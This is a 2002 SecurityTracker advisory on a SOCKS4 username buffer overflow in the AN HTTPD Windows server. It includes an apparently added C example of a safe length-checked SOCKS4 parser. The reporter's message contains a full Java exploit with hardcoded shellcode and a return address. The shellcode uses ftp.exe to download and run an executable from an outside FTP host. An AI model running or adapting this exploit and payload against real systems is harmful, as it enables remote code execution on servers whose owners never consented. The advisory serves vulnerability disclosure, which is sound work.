SecurityTracker.com
SecurityTracker Archives

Category:  Application (Web Server/CGI)  >  AN HTTP Server
Vendors:  nakata@st.rim.or.jp
AN HTTPD Buffer Overflow in Processing SOCKS4 Requests Allows Remote Code Execution
SecurityTracker Alert ID:  1005457
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Oct 21 2002
Impact:  Execution of arbitrary code via network, User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 1.30 to 1.41c
Description:  A vulnerability was reported in the AN HTTP Server web server for Microsoft Windows platforms. A remote user can execute arbitrary code on the system.

It is reported that a remote user can send a SOCKS4 request containing a long username to the server to trigger a buffer overflow and execute arbitrary code on the target host.

A demonstration exploit is provided in the Source Message.
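The cause listed below is a boundary error in the handling of the SOCKS4 USERID field. As an added illustration of the defensive side (this is not AN HTTPD's source, which is not published here, and not the reporter's code), the C parser that follows locates the NUL-terminated USERID within the bytes actually received and rejects the request before copying anything when the field exceeds a fixed cap or has no terminator. The 255-byte cap, the function names and the constructed sample request (CONNECT to 10.0.0.1:80) are assumptions made for the example; the 1020-byte username used in the demo mirrors the padding length in the proof of concept quoted further down.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* SOCKS4 request wire format:
 *   VN(1) CD(1) DSTPORT(2, big-endian) DSTIP(4) USERID(variable) NUL(1)
 * USERID carries no length prefix, so a server must find the NUL inside
 * the bytes it actually received and refuse anything longer than the
 * buffer it intends to copy into. */
#define SOCKS4_HDR_LEN    8
#define SOCKS4_USERID_MAX 255   /* assumed policy cap chosen for this example */

enum socks4_status {
    SOCKS4_OK = 0,
    SOCKS4_ERR_SHORT,               /* fewer than 8 header bytes received   */
    SOCKS4_ERR_VERSION,             /* VN is not 4                          */
    SOCKS4_ERR_COMMAND,             /* CD is neither CONNECT(1) nor BIND(2) */
    SOCKS4_ERR_USERID_UNTERMINATED, /* no NUL inside the received bytes     */
    SOCKS4_ERR_USERID_TOO_LONG      /* NUL found, but past the cap          */
};

struct socks4_request {
    uint8_t  cd;
    uint16_t dstport;                        /* host byte order */
    uint32_t dstip;                          /* host byte order */
    char     userid[SOCKS4_USERID_MAX + 1];  /* NUL-terminated on success */
};

/* Parse 'len' received bytes. Nothing is copied until every length check
 * has passed, so an oversized USERID is rejected instead of overflowing
 * the fixed-size userid buffer. */
enum socks4_status socks4_parse(const uint8_t *buf, size_t len,
                                struct socks4_request *out)
{
    if (len < SOCKS4_HDR_LEN)        return SOCKS4_ERR_SHORT;
    if (buf[0] != 4)                 return SOCKS4_ERR_VERSION;
    if (buf[1] != 1 && buf[1] != 2)  return SOCKS4_ERR_COMMAND;

    /* memchr, not strlen: network input is not a C string and may carry
     * no terminator at all. */
    const uint8_t *uid   = buf + SOCKS4_HDR_LEN;
    size_t         avail = len - SOCKS4_HDR_LEN;
    const uint8_t *nul   = memchr(uid, 0, avail);
    if (nul == NULL)                 return SOCKS4_ERR_USERID_UNTERMINATED;
    size_t uid_len = (size_t)(nul - uid);
    if (uid_len > SOCKS4_USERID_MAX) return SOCKS4_ERR_USERID_TOO_LONG;

    out->cd      = buf[1];
    out->dstport = (uint16_t)((buf[2] << 8) | buf[3]);
    out->dstip   = ((uint32_t)buf[4] << 24) | ((uint32_t)buf[5] << 16) |
                   ((uint32_t)buf[6] << 8)  |  (uint32_t)buf[7];
    memcpy(out->userid, uid, uid_len);
    out->userid[uid_len] = '\0';
    return SOCKS4_OK;
}

/* Constructed test input: a CONNECT to 10.0.0.1:80 whose USERID is
 * 'userid_len' bytes of 'A'. Returns the total request length, or 0 if
 * it would not fit in 'cap' bytes. */
size_t socks4_build(uint8_t *dst, size_t cap, size_t userid_len)
{
    static const uint8_t hdr[SOCKS4_HDR_LEN] =
        { 0x04, 0x01, 0x00, 0x50, 0x0A, 0x00, 0x00, 0x01 };
    size_t total = SOCKS4_HDR_LEN + userid_len + 1;
    if (total > cap) return 0;
    memcpy(dst, hdr, SOCKS4_HDR_LEN);
    memset(dst + SOCKS4_HDR_LEN, 'A', userid_len);
    dst[SOCKS4_HDR_LEN + userid_len] = 0;
    return total;
}

/* Build and parse in one step; 'drop_nul' simulates a peer that never
 * sends the terminator (or a read that stopped before it). */
enum socks4_status socks4_demo(size_t userid_len, int drop_nul)
{
    uint8_t pkt[4096];
    struct socks4_request req;
    size_t n = socks4_build(pkt, sizeof pkt, userid_len);
    if (n == 0) return SOCKS4_ERR_SHORT;
    return socks4_parse(pkt, drop_nul ? n - 1 : n, &req);
}

int main(void)
{
    printf("5-byte USERID    -> %d\n", socks4_demo(5, 0));    /* 0 = SOCKS4_OK */
    printf("1020-byte USERID -> %d\n", socks4_demo(1020, 0)); /* 5 = SOCKS4_ERR_USERID_TOO_LONG */
    printf("no terminator    -> %d\n", socks4_demo(5, 1));    /* 4 = SOCKS4_ERR_USERID_UNTERMINATED */
    return 0;
}
```

The point of the ordering in socks4_parse is that the length of the untrusted field is established from the received byte count before any copy happens; a server that copies first and checks afterwards (or never checks) has exactly the boundary error this advisory records.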

Impact:  A remote user can execute arbitrary code on the server with the privileges of the web server process.
Solution:  The vendor has released a fixed version (1.41d), available at:

http://www.st.rim.or.jp/~nakata/
http://www.st.rim.or.jp/~nakata/httpd141d.exe

Vendor URL:  www.st.rim.or.jp/~nakata/
Cause:  Boundary error
Underlying OS:  Windows (Any)
Reported By:  Kanatoko <anvil@jumperz.net>
Message History:   None.


 Source Message Contents

Date:  Mon, 21 Oct 2002 01:38:15 +0900
From:  Kanatoko <anvil@jumperz.net>
Subject:  AN HTTPD SOCKS4 username Buffer Overflow Vulnerability

 


Advisory Information
--------------------
Name                   : AN HTTPD
Vendor Homepage        : http://www.st.rim.or.jp/~nakata/
Platforms              : Windows9x/Me/NT/2000/XP
Vulnerability Type     : stack overflow (very easy to exploit)
Vendor Contacted       : 17/10/2002
Vendor Replied         : 20/10/2002
Vulnerable Versions    : 1.30 to 1.41c
Non affected version   : 1.41d


Description
--------------------
AN HTTPD is Japanese multi-purpose server software.
It can work as a SOCKS4 server.

We found an exploitable buffer overflow problem in AN HTTPD Version 1.41c.
Sending a SOCKS4 request with a long username causes a buffer overflow. This
vulnerability allows a remote attacker to execute arbitrary code on the
target host.


Proof of Concept
----------------
anhttpd141c_exploit.java

/*///////////////////////////////////////////////////////////////////////////

 AN HTTPD Version 1.41c SOCKS4 username buffer overflow exploit
  for Japanese Windows 2000 Pro (SP2)

 written by Kanatoko <anvil@jumperz.net>
 http://www.jumperz.net/

///////////////////////////////////////////////////////////////////////////*/

import java.net.*;
import java.io.*;

public class anhttpd141c_exploit
{
private static final int SOCKS_PORT	= 1080;

private String targetHost;
//----------------------------------------------------------------------------
public static void main( String[] args )
throws Exception
{
if( args.length != 1 )
	{
	System.out.println( "Usage: java anhttpd141c_exploit TARGETHOST( or IP )" );
	return;
	}
anhttpd141c_exploit instance = new anhttpd141c_exploit( args[ 0 ] );
instance.doIt();
}
//----------------------------------------------------------------------------
public anhttpd141c_exploit( String IN_targetHost )
throws Exception
{
targetHost	= IN_targetHost;
}
//----------------------------------------------------------------------------
private void doIt()
throws Exception
{
Socket socket	= new Socket( targetHost, SOCKS_PORT );
OutputStream os	= socket.getOutputStream();

	// SOCKS4 header: VN=4, CD=1 (CONNECT), DSTPORT, DSTIP; USERID follows
byte[] socks4_request = {
(byte)0x04, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01
};

	// egg: download and start installing Netscape4.79 :)
	// http://www.jumperz.net/egg_netscape.cpp
byte[] egg = {
(byte)0x55, (byte)0x8B, (byte)0xEC, (byte)0x53, (byte)0xEB, (byte)0x57, (byte)0x90, (byte)0x90, 
(byte)0x90, (byte)0x5B, (byte)0x33, (byte)0xC0, (byte)0x88, (byte)0x63, (byte)0x01, (byte)0x88, 
(byte)0x63, (byte)0x03, (byte)0x83, (byte)0xC3, (byte)0x68, (byte)0x88, (byte)0x23, (byte)0x88, 
(byte)0x63, (byte)0x21, (byte)0x88, (byte)0x63, (byte)0x2E, (byte)0x83, (byte)0xEB, (byte)0x68, 
(byte)0x53, (byte)0x83, (byte)0xC3, (byte)0x02, (byte)0x53, (byte)0xB9, (byte)0xC2, (byte)0x1B, 
(byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x50, (byte)0x83, (byte)0xC3, (byte)0x02, 
(byte)0x53, (byte)0xB9, (byte)0x8B, (byte)0x38, (byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, 
(byte)0x59, (byte)0xB9, (byte)0xB8, (byte)0x0E, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, 
(byte)0x83, (byte)0xC3, (byte)0x65, (byte)0x53, (byte)0xB9, (byte)0x4A, (byte)0x9B, (byte)0x01, 
(byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x83, (byte)0xC3, (byte)0x21, (byte)0x53, (byte)0xB9, 
(byte)0x4A, (byte)0x9B, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0xB8, (byte)0x94, 
(byte)0x8F, (byte)0xE6, (byte)0x77, (byte)0xFF, (byte)0xD0, (byte)0xE8, (byte)0xA7, (byte)0xFF, 
(byte)0xFF, (byte)0xFF, (byte)0x77, (byte)0x58, (byte)0x71, (byte)0x58, (byte)0x62, (byte)0x69, 
(byte)0x6E, (byte)0x61, (byte)0x72, (byte)0x79, (byte)0x0A, (byte)0x67, (byte)0x65, (byte)0x74, 
(byte)0x20, (byte)0x2F, (byte)0x70, (byte)0x75, (byte)0x62, (byte)0x2F, (byte)0x63, (byte)0x6F, 
(byte)0x6D, (byte)0x6D, (byte)0x75, (byte)0x6E, (byte)0x69, (byte)0x63, (byte)0x61, (byte)0x74, 
(byte)0x6F, (byte)0x72, (byte)0x2F, (byte)0x65, (byte)0x6E, (byte)0x67, (byte)0x6C, (byte)0x69, 
(byte)0x73, (byte)0x68, (byte)0x2F, (byte)0x34, (byte)0x2E, (byte)0x37, (byte)0x39, (byte)0x2F, 
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x2F, 
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x39, 
(byte)0x35, (byte)0x5F, (byte)0x6F, (byte)0x72, (byte)0x5F, (byte)0x6E, (byte)0x74, (byte)0x2F, 
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x70, (byte)0x6C, (byte)0x65, (byte)0x74, (byte)0x65, 
(byte)0x5F, (byte)0x69, (byte)0x6E, (byte)0x73, (byte)0x74, (byte)0x61, (byte)0x6C, (byte)0x6C, 
(byte)0x2F, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, (byte)0x64, (byte)0x34, (byte)0x37, 
(byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, (byte)0x0A, (byte)0x71, (byte)0x75, 
(byte)0x69, (byte)0x74, (byte)0x58, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x65, 
(byte)0x78, (byte)0x65, (byte)0x20, (byte)0x2D, (byte)0x73, (byte)0x3A, (byte)0x71, (byte)0x20, 
(byte)0x2D, (byte)0x41, (byte)0x20, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x6E, 
(byte)0x65, (byte)0x74, (byte)0x73, (byte)0x63, (byte)0x61, (byte)0x70, (byte)0x65, (byte)0x2E, 
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x58, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, 
(byte)0x64, (byte)0x34, (byte)0x37, (byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, 
(byte)0x58
};

byte[] jmp_esp = {
(byte)0x02, (byte)0x4E, (byte)0x02, (byte)0x78
};

os.write( socks4_request );

	//where is memset? :0
for( int i = 0; i < 1020; ++i )
	{
	os.write( (byte)0x41 );
	}

os.write( jmp_esp );
os.write( egg );
os.write( (byte)0x00 );
}
//----------------------------------------------------------------------------
}

-- 
Kanatoko  <anvil@jumperz.net>
JUMPERZ.NET : http://www.jumperz.net/(Japanese)

Copyright 2002, SecurityGlobal.net LLC